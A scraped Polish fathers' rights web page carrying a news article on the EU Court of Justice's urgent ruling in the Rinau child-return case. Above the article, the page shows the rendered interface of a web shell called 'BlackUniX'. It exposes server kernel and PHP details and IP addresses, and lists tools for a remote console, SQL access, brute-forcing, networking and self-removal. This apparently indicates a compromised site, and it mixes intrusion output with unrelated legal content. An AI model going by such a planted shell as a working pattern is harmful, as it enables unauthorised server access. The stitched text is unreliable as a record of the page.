W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-22 19:20:31
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.92.150.98
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Sąd jednego państwa może zastosować procedurę pozwalającą na natychmiastowe wydanie dziecka,
12.07.2008.
Trybunał Sprawiedliwości w wyroku w sprawie C-195/08 (sprawa Rinau)  zastosował po raz pierwszy tzw. pilny tryb prejudycjalny, co oznacza, że w sytuacji gdy trwa walka o dziecko między rozwodzącymi się rodzicami z różnych krajów UE, sąd jednego państwa może zastosować procedurę pozwalającą na natychmiastowe wydanie dziecka, nawet gdy sądy drugiego państwa zmieniają orzeczenia co do tego wydania.
Chodziło o sprawę litewsko-niemieckiego małżeństwa Rinau i ich dziecka. Małżonkowie mieszkali w Niemczech. Dwa miesiące po przyjściu na świat ich córki, rozstali się, a córka pozostała przy matce. Wszczęte zostało postępowanie rozwodowe. Po uzyskaniu zgody męża na zagraniczny urlop z córką, Inga Ringu wyjechała z dzieckiem na Litwę. Tam pozostała i mieszka do tej pory.

Sądowa walka o dziecko

W sierpniu 2006 r. niemiecki sąd w Oranienburg powierzył tymczasowo opiekę nad Luisą jej ojcu. Jednak sąd w Kłajpedzie (Litwa) oddalił wniosek Michaela Rinau o wydanie córki do Niemiec.

20 czerwca 2007 r. Amtsgericht Oranienburg orzekł rozwód małżonków, a opiekę nad Luizą przyznał ojcu.

Biorąc pod uwagę to, że sąd w Kłajpedzie odmówił wydania dziecka, sąd niemiecki nakazał Indze Rinau odesłanie córki do Niemiec i przekazanie jej pod opiekę ojca. W tym celu wydał świadectwo wykonalności orzeczenia nakazującego wydanie dziecka (zgodnie z rozporządzeniem wspólnotowym dotyczącym wykonywania orzeczeń w sprawach dotyczących odpowiedzialności rodzicielskiej - rozporządzenie Rady nr 2201/2003). Takie świadectwo pozwala na automatyczne uznanie dziecka w innym państwie członkowskim.

Sądy litewskie nie były zgodne

W tzw. międzyczasie zmieniła się sytuacja w orzecznictwie sądów litewskich w tej sprawie. Sąd apelacyjny zakwestionował wcześniejsze orzeczenie sądu okręgowego odmawiające wydania Luisy. Natomiast matka dziewczynki wystąpiła do litewskiego Sąd Najwyższy z wnioskiem o nieuznanie orzeczenia sądu niemieckiego.

Sąd Najwyższy miał jednak wątpliwości proceduralne. Zastanawiał się, czy niemiecki Amtsgericht mógł wydać świadectwo stwierdzające wykonalność orzeczenia nakazującego wydanie dziecka, skoro litewski sąd apelacyjny zmienił już orzeczenie sądu okręgowego?

Na to pytanie odpowiedział Trybunał Sprawiedliwości.

Zmiana orzeczenia nie wstrzymuje procedury wydania

Trybunał potwierdził, że zasadniczo świadectwo dotyczące wykonalności może być wydane tylko wtedy, gdy wcześniej zostało wydane orzeczenie odmawiające wydania dziecka. Jednak fakt, że orzeczenie to zostało potem zmienione, uchylone czy zawieszone przez sąd wyższej instancji nie może być przeszkodą do wydania takiego świadectwa. W przeciwnym razie nie można byłoby stosować procedury pozwalającej na natychmiastowe wydanie dziecka przetrzymywanego w innym kraju niezgodnie z prawem.

    Co daje pilny tryb prejudycjalny

    Pilny tryb prejudycjalny, zastosowany po raz pierwszy w tej sprawie, wszedł w życie 1 marca 2008 r. Dzięki niemu Trybunał Sprawiedliwości może znacznie szybciej rozpatrywać zagadnienia z zakresu obszaru wolności, bezpieczeństwa i sprawiedliwości. Mogą one powstać na przykład:

    - gdy spór dotyczy władzy rodzicielskiej lub opieki nad dziećmi,

    - gdy właściwość sądu, przed którym sprawa zawisła na podstawie przepisów prawa wspólnotowego, zależy od odpowiedzi na pytanie prawne.

Źródło : Rzeczpospolita
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:

Odwiedza nas 2 gości
22.06.2018.